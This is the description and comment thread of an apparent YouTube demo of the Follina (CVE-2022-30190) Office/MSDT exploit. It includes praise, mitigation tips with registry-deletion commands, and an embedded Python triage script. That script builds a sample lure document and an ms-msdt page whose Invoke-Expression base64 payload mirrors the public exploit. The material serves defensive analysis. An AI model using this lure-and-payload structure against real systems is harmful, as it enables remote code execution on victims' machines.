Want to become a HACKER? ITProTV has you covered: ntck.co/itprotv (30% off FOREVER) *affiliate link
🧪🧪Try it yourself!! (Links, docs, and walkthrough): ntck.co/follinalinks
SPECIAL THANKS to John Hammond (go check him out!!)
---------------------------------------------------
-CZcams: czcams.com/users/JohnHammond010
-Twitter: twitter.com/_JohnHammond
-his amazing article on Follina: www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug
🔥🔥Join the NetworkChuck Academy!: ntck.co/NCAcademy
**Sponsored by ITProTV
0:00 ⏩ Intro
1:58 ⏩ How does CVE-2022-30190 work??
6:33 ⏩ What happens when you open the file?
9:23 ⏩ Let’s set up our zero-day vulnerability lab!
17:29 ⏩ Time to test the Malware!
20:00 ⏩ Outro
Omg, your hair looks extremely good today. I like the side parting 🙀❤️
Ohh, and a Big thanks for your Videos. I Watched Them *all* ❤️🌹~
could it be that you got the t-shirt for father's day? xD if so, then that was a cool idea of theirs
we follow your work in Brazil 🇧🇷✨ .this encourages me !! thank you brother.
Love the way you talk 🥰
you typed mcd
Thanks for keeping the “mistakes” in the video. It reinforces the information sooo much better !
HUGE thanks for letting me come crash the party, NetworkChuck!! Looking forward to all the crazy cool stuff we can do in the future 😎
Ooohhhhh yeaaaaah
hi
I was so scared to 'click' this thread😰
fast video on this hot topic, gj
Hello there !!
It was amazing seeing Chuck test a real vunerability, this could be a very interesting series on your channel!
Zero-day vulnerabilities are scary and should be learned with caution. Thank you for the information and keep it up!
It's not scary. Do not open any files from email and you are 100% safe 🤷😂
Do not open .docx or .doc anymore that's it.
Use a trial VPS instead to open it if you really need to see what's inside the document.
@Hòmè Ďeçoŕè hmmmmmmmmm
@@axa897That’s true for this one. But there are 0click 0days out in the wild too. Take for example the pegasus spyware that got installed by just your phone receiving a message/gif and you not doing anything with it.
Thank you Network Chuck for making this video so quickly and of course thanks to John Hammond. I followed along and indeed was fun to play around with.
As an ethical hacker in making, I really appreciated this video, very informative as always, thanks, Chuck!
Can you please hack my old inactive instagram account?
Hello there. I hope I am not intruding on your busy schedule. I was just wondering if you knew whether someone found a fix to this that doesn't involve the removal of the new text file option? I followed the official guide to fix it and I just reversed it back to before the fix because I can't bear having to open Notepad to create a text file.
@timeismore7239 Hahaha, you think that's easy?
As a middle aged bearded geek going through A+ cert after years of computer nerdery, your videos always ring true to what I seem to be learning at any moment be it bash, be it ip sucking at subnetting or zero day exploits…Chuck you are tuned in to what so many delicious topics! Thanks for being our coffee! ☕️
yoooooo, where did you reach now ? have you passed A+?
I sure did. To date I have my A+, Net+, Sec+, Server+, Cloud+, LPI and am working on my CYSA+ and am lucky enough to be teaching entry level cybersecurity classes in workforce development.
@gregatit daaaaaaamnnn bro
Very interesting video. I've been playing with python for the last 5 or 6 months, but never knew you could make a webserver like that. Great content!!!
Definitely would like to see more of these type of videos. As a user of the 365 support and recovery tool for troubleshooting tenant issues I’m wondering how vulnerable the program is to being exploited, especially not knowing how superficial endpoint scanning is…
Thank you for this video, relatable content as I'm in the cyber security field. Would definitely be interested in more content like this.
12:53 was expecting him to say to take another coffee break lolol
Chuck definitely do more stuff like that!!
Will do!
Microsoft be like: it’s not a bug, it’s a feature
Man, after months of "20 min video to explain if/else" it's really, really nice to see full-power, highly caffeinated Chuck again
@NetWorkChuck Yes, you should keep doing vids like this. The good thing to this would be your growing along the way AND bringing others with you as they learn these things too!
You should really do a playlist explaining these vulnerabilities.
Yes, there are channels explaining this stuff, but with you and your way of teaching things, explaining a CVE and how it works is a must for security professionals, especially if they want to be blue or red team pros, or even us, who are just passionate of these things.
Do a playlist!!!!!!
Super Video Chuck Your videos are awesome And informative
Windows Defender seems to have caught up with Follina. Word still reaches out to the server, but that's it. You get a warning and nothing else is happening - at least with my setup, don't feel too safe. I really like the idea of Chuck and John making content as a team, by the way!
It depends on what you do with Follina. Hackers are experts in remaining undetected. What Chuck shows you is a very basic attack, but in real-life instances victims wouldn't know that anything has been done, other than that they open a Microsoft product and the troubleshooting window runs.
@MrSpyLiam Of course. But as Defender seems to actually prevent the execution, it shouldn't really matter what payload is used. I might be wrong, though 🤷🏻♂️
Amazing collab! Been following both of you for a while, awesome to see!
The intro kind of got me thinking - I can rickroll my friends with this and at the same time teach them about the Follina :D
Awesome!!! Tnx for the demo! Btw, gotta love that bash prompt, can you share the code so I can paste it in my .bashrc?
It's the standard Kali Linux prompt. Could be powerlevel10k
Hey Chuck, I've actually come across the exact same thing yesterday, except it wasn't a Word document. It was a whole installation ISO of Windows 11 Pro, which my brother downloaded from the Pirate Bay. It triggered instantly once the installation was completed, and had some more effects to it whereby it damaged hardware so badly that the BIOS was messed up as well.
You mean it ran this diagnostic tool window once installation was finished?
@AnotherSkyTV Yes, once installation was finished, the PC rebooted; once signed in, the diagnostic popped up.
An ISO that you use at boot has basically full access to your system; not a good idea to download that from a pirate site without at least checking it in a VM first. msdt is the least of your issues when it comes to that lmao
Networkchuck & John Hammond content love to see that! Thank you chuck for the great content
Everytime I watch one of your videos about Linux I learn something new and want to learn more. Great video.
Amazing video Chuck. More content like this please dude
This entire day, I see this vulnerability everywhere lol 😂😂
Btw, this vulnerability works only on a few versions of Office.
Which versions of Office are affected?
@cobalt-snake6125 365, 2017 - 2019 I think
If it is in RTF format, you don't have to open it.
@taahaseois.8898 Yup, that's right
@cobalt-snake6125 The latest one is. Don't know about the rest; also I'm pretty sure Microsoft said they aren't going to fix it.
It's really awesome that this video references what you learn in the Hack The Box course.
Thanks for your work
I love it. Tested it out and got it working.
I wonder if the company I work for would have to worry about this. Sure they have it blocked already but you never know. Company is world wide
Always loved the fascinating coding style of Zer0-Day since the mid 90's.
More of these videos please!
Imma send this to my friends and add something saucy to their browser history file lol
Man, I can just hear you talking for hours 😂
I'm French but I so easily understand what you say without paying attention. I admire your eloquence buddy 👏😎
Mr. Chuck, I've been following you since 2020, bro. I'm so glad I followed you all these years; you made my path, my career, clear to me. All I just want to say is thank you. Keep on doing what you're doing; if my God wills it, I'll keep on supporting your content, bro (Muslim from Malaysia) 😁😁
34 is not a "weird obfuscation" but just the `"` required so the Base64 function receives the payload string and decodes and executes it, like a normal function call where the argument is a string, in this case a base64-encoded payload.
Hey, I (am 14) quit Linux like 4-5 months ago as I wasn't able to understand anything, but then I came across your tutorials (Kali for beginners) and now you gain 1 sub and a like on each video. Thanks for helping man, you are awesome. Keep it up.
2 of my favorite youtubers looking at one of my favorite zero days
Love watching these thanks Chuck and John for sharing! Legends!
Hey Chuck! What is inside that coffee, man? Your voice speed in that video was like 3.5X already!
To be honest I am someone who doesn't have an interest in hacking, but YouTube keeps suggesting your videos, which are really fun to watch 🙃
Just came across his channel; nobody warned me that the Viking lineage was still going strong. What an evolution path, from raiding to coding.
Love the facial hair here, just kidding around. You look like a character in Vikings late seasons, the brother of a King if I recall correctly but his name I can't say.
Cheers
I'm in love with these videos. I'm 16 and videos like this inspire me in my hacking hobby. ❤️🔥
I like these types of videos; they tell you about the dangerous tool but never tell you how to ACTUALLY get it to work, so I will. For people who have no programming background and don't know how to make your own version of this vulnerability: run this on a Windows that has updates disabled and hope the Windows on the target PC is an old version that can't detect this vulnerability. And for people who can program, here is a small tip:
I honestly have no idea lol; if anyone actually can bypass the detection let me know lol
Thank you so much for this I have been waiting someone to do videos like this!
I think most people became aware through Microsoft's post on how to fix it with just like 2 command-line things
Great stuff. Next time, ease up on the coffee a bit - it was making you hyper and jittery ... but very effective
Defo a cool video, great to see first hand in a really easy flowing way how to create a lab like this.
Missed opportunity to name yourself TechCheckChuck
I'm 12 and learn so much from this channel. Thanks!
I'm so happy to look at the faces of people who talk about vulnerabilities in open-source software. I'm very, very, very happy to know about this zero-day vulnerability.
Also interesting stuff besides follina: python web server and adding a NAT network in VirtualBox on-the-fly. Got it running. Thx a lot!
Hacker's Delight: Hmm, we luv Macros-N-Cheese
no macros here
@NetworkChuck just need something with the bland cheese🧀 😂🤣😅
Love John Hammonds content and yourself and would love to see more collabs
12:18 Saying: "CMD", typing: "mcd"...
13:47 You call the file manager in Kali (I don't know exactly which one is installed there...) "Explorer or whatever" and then call the *M$ Windows Explorer* "Finder" (which is the Mac's file manager)...
Nice video!
How do you have the most basic of mugs during your coffee break, sir? Let's up that game, eh?
SOE Engineer here. Stuff like this makes my team busy, pushing out the reg hack fix to 4,000 devices to try and mitigate this alongside reporting status updates to management. Fun times.
Great video as always, and love to see John here as well! I followed along and was going to download the follina.doc from the Python web server on the Windows box, but Windows Defender deleted it and detected a virus. So that is at least a good thing; looks like I'm a bit late to the party!
Yoo, a collab with John! Amazing video, congrats.
Super interesting!
I don't know if any solution has been found yet. If anyone is interested, there are probably some workarounds, but the one I know about is to disable the 'MSDT URL Protocol'.
Always amazing to see which ways hackers are getting into people's systems.
Thanks for another great video Chuck!
this is what I did through cmd.
@Mainstayjay I just wrote a batch file for doing this, and also included a way to back up the registry key that must be "deleted" so I can restore it when this has been patched.
@godsman271 you fancy man you. Very cool!
I often wonder if you record your Voice and Video at Normal speed and then speed it up before uploading? If not Kudos to you, pretty amazing.
Excellent !! Thanks for this detailed explanation and demo
Really great video. I loved how you showed troubleshooting and set up that Python web server to share that file. Great content as always.
this content is amazing!! keep it up this way :)
This was great! I was watching and when you created the new network after you had already generated the word document I was like “that’s not going to work anymore” ha ha!
Love yours and John’s content!
VERY interesting! Please do more videos like this!
Vulnerability vids are top notch
Zero-day? Microsoft knew about this bug for 1.5 months, they simply chose to do nothing about it.
A zero day can last for years if not addressed properly. But this is what happens when there is no government control over companies like Microsoft. They do it a lot with health and safety, but when it comes to IT systems it's like meh.
In essence, exploits of Follina involve a Word document containing a web link to an attacker-controlled web resource. Since Word automatically fetches such embedded links, the attacker may specially craft their content such that it invokes an MSDT instance, which may be used to force the execution of attacker-supplied PowerShell commands. However, you failed to mention that Follina may be exploited in a zero-click fashion using a file in .rtf format, which runs the code via the Preview pane in Explorer.
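The two stages the comment above describes (Word fetching an external OLE link on open, and the fetched page handing MSDT an ms-msdt: URI that wraps a base64-encoded PowerShell payload) as an added triage example. This is not code from the video or from the linked Huntress write-up; it assumes only the standard OOXML relationship vocabulary, and the sample lure and sample page below are constructed here (the ms-msdt argument names in the sample follow the shape of the public proof of concept, and the scanner does not depend on them). The .rtf preview variant is not covered, since an .rtf is not a zip package.

```python
"""
Triage helpers for a Follina-style (CVE-2022-30190) lure.

Stage 1: a .docx is a zip; an OLE object Word should load from outside the
         package is a Relationship with TargetMode="External". A web URL
         there is the hook Word fetches when the document opens.
Stage 2: the fetched page carries an ms-msdt: URI; the PowerShell usually
         rides inside as a base64 string, so decode every base64-looking run.

Added example; samples are constructed, not taken from a real lure.
"""
import base64
import io
import re
import xml.etree.ElementTree as ET
import zipfile

# OOXML relationship vocabulary (fixed by the format, not an assumption).
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")


def external_ole_targets(docx_bytes: bytes) -> list[str]:
    """Remote (http/https) OLE relationship targets in every .rels part."""
    hits: list[str] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                if (rel.get("Type") == OLE_REL_TYPE
                        and rel.get("TargetMode") == "External"
                        and re.match(r"(?i)https?://", target)):
                    hits.append(target)
    return hits


# Runs of base64 alphabet long enough to be a payload, not an identifier.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def msdt_payloads(page: str) -> list[str]:
    """If the page carries an ms-msdt: URI, return the decoded base64 strings
    found in it (the PowerShell that MSDT would end up running)."""
    if "ms-msdt:" not in page.lower():
        return []
    decoded: list[str] = []
    for blob in B64_BLOB.findall(page):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # an identifier that merely looked like base64
        if all(c.isprintable() or c.isspace() for c in text):
            decoded.append(text)
    return decoded


# ---- constructed samples ---------------------------------------------------

def build_sample_docx(target: str) -> bytes:
    """Minimal docx whose one OLE relationship points at `target` (constructed)."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OLE_REL_TYPE}" '
        f'Target="{target}" TargetMode="External"/>'
        '</Relationships>'
    )
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/'
        'wordprocessingml/2006/main"><w:body/></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", document)
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


SAMPLE_COMMAND = "Start-Process calc.exe"  # benign stand-in for the payload
SAMPLE_B64 = base64.b64encode(SAMPLE_COMMAND.encode()).decode()
# Constructed page: shape of the public PoC, with the command above inside.
SAMPLE_PAGE = (
    "<html><script>\n"
    'location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_BrowseForFile=$(Invoke-Expression([System.Text.Encoding]::UTF8'
    f".GetString([System.Convert]::FromBase64String('{SAMPLE_B64}'))))\\\"\";\n"
    "</script></html>"
)

if __name__ == "__main__":
    lure = build_sample_docx("http://198.51.100.7:8000/index.html")
    print("external OLE targets:", external_ole_targets(lure))
    print("decoded payloads:", msdt_payloads(SAMPLE_PAGE))
```

Point `external_ole_targets` at a suspicious attachment before anyone opens it; a web URL in an external oleObject relationship is the thing to pull and feed to `msdt_payloads` from a sandbox, not from the user's machine.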
awesome! thank you Chuck and John!
The way you talked walking through this reminded me of my brain 😂
amazing video! Great work!
Nice demo Chuck.
John I see you’re still doing your thing.
Subscribed!
MS troubleshooter disabled, checked. Thank you for the video.
I feel like this has probably been in the wild for years; this is so simple. Frightening.
Whoa Chuck, this is awesome, that you show us this!
In a well-prepped .rtf you don't even need user interaction. The preview of the .rtf in Windows Explorer is enough. Maybe even Outlook preview of an .rtf file attachment; not sure rn.
Thanks for your sharing
3:00 Ooohh that's powerful! Everything on a Windows machine uses the MSDT.
Is that GitHub script still working? It's showing an error for me.
@ztech9604 I haven't tried to download it yet.
Superb..... I watch only like movie hacking video... Really don't know how it's working..... Thanks .....
This was GREAT. PLS make more of this videos :)
Definitely do more of this.
great video
Always make sure to follow instructions correctly, coffee breaks at the correct times are absolutely critical
You can actually get around it by adding specific keys to the registry of systems. Not a microsoft fix but it will protect you.
By deleting the ms-msdt key, not by adding.
Remove-Item REGISTRY::HKEY_CLASSES_ROOT\ms-msdt -Recurse -Force OR reg delete HKEY_CLASSES_ROOT\ms-msdt /f
Make sure to backup first (reg export HKEY_CLASSES_ROOT\ms-msdt $env:USERPROFILE\Undo_FollinaFix_MS-MSDT.reg)
Chuck, I think you’ve had enough coffee breaks. Love the videos!
Watching you re-size the Terminal Emulator gave me chills. :o Anonymity 101: Don’t resize your terminal windows, that’s another unique identifier.
Nice video NetworkChuck, thanks for the information, and I think that you can disable msdt with a registry key so we can be safer.
"What is this, a crossover episode?" - Mr. Peanutbutter
Yes, more of this kind of video would be great
I enjoyed every minute of it
Chuck you rock!
YES! More of this!
this is such a great video! thank you for your work!
Amazing! thank you for showing it
Wow, nice video, especially liked the part with the Python server. I didn't know you could do this; it's so cool
I used netcat before to emulate a postscript printer so that I could use an older printer with windows. Windows used it as a network attached postscript printer that linux used netcat to get the file and convert it to pdf then print using a driver available in linux.
Be doing more on CVEs that arise from the wild chuck. Understood it better now.
I just got me AWS and love the Channel and education
I've got a fix for it, just remove the registry key "Computer\HKEY_CLASSES_ROOT\ms-msdt" completely and you're done, make a backup of the key before you remove the key.
When the registry key is removed there's no way someone can remote control your computer using msdt.exe.
I got this information from Dave Plummer, he's a retired Microsoft Operating Systems Engineer so he knows what he's talking about, here's a link to his video where he explains it all in detail: czcams.com/video/gmP8AtmVr0o/video.html
And then there's me, who just learnt for the first time how to install office using cmd !! 🙃
Jokes aside, Imma open all docs in virtual machines here on.
0patch just released an unofficial patch that doesn't disable the MSDT URL protocol handler, and instead sanitizes the user-provided path. It's free if you register a 0patch account.
YouTuber Dave Plummer posted a registry deletion to prevent the Word doc hack. Do you agree? Thanks, enjoyed watching you work at light speed. Cheers
Chuck, honestly this is really spooky. I don't have a laptop so I am using Termux on my Android, and in Termux you'll have to use --command or -c all at once and you'll have to specify your interface or use the default... Tried it at work and it worked.... Honestly it's spooky